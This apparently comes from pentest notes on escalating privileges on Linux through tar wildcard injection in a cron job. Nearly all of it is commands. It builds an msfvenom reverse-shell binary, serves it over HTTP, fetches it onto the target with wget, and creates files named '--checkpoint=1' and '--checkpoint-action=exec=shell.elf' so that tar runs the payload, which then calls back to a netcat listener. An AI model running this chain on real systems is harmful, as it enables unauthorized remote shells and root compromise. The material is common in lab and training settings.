Wildcard and cronjob
Last updated
Last updated
kali> msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.142.155 LPORT=53 -f elf -o shell.elf
kali> python -m SimpleHTTPServer
kali> nc -nlvp 53
# Target
wget http://192.168.142.155:8000/shell.elf
chmod 755 shell.elf
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
# Wait until you see the netcat connection back to kali.